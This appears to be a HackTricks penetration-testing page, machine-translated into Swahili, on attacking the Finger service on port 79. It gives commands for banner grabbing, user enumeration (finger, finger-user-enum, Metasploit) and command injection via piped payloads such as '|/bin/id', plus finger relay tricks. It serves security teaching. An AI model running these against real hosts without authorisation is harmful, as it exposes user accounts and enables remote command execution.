79 - Pentesting Finger

Reading time: 2 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Basic Info

Programu/huduma ya Finger inatumika kupata maelezo kuhusu watumiaji wa kompyuta. Kawaida, taarifa zinazotolewa zinajumuisha jina la kuingia la mtumiaji, jina kamili, na, katika baadhi ya matukio, maelezo ya ziada. Maelezo haya ya ziada yanaweza kujumuisha eneo la ofisi na nambari ya simu (ikiwa inapatikana), wakati mtumiaji alingia, kipindi cha kutokuwa na shughuli (wakati wa kupumzika), tukio la mwisho ambalo barua pepe ilisomwa na mtumiaji, na maudhui ya mipango na faili za mradi za mtumiaji.

Bandari ya kawaida: 79

PORT   STATE SERVICE
79/tcp open  finger

Uhesabu

Kuchukua Bango/Kuunganisha Msingi

bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Uainishaji wa mtumiaji

bash
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Mbadala yake unaweza kutumia finger-user-enum kutoka pentestmonkey, baadhi ya mifano:

bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap tekele script kwa kutumia scripts za default

Metasploit inatumia hila zaidi kuliko Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Utekelezaji wa amri

bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Tumia mfumo kama finger relay

finger user@host@victim
finger @internal@external

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks